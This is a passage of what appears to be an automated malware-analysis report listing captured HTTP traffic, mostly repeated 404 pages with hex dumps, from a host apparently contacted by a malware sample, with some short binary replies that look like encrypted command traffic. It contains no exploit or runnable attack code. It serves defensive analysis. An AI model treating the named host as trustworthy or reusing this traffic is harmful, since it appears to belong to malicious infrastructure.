61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
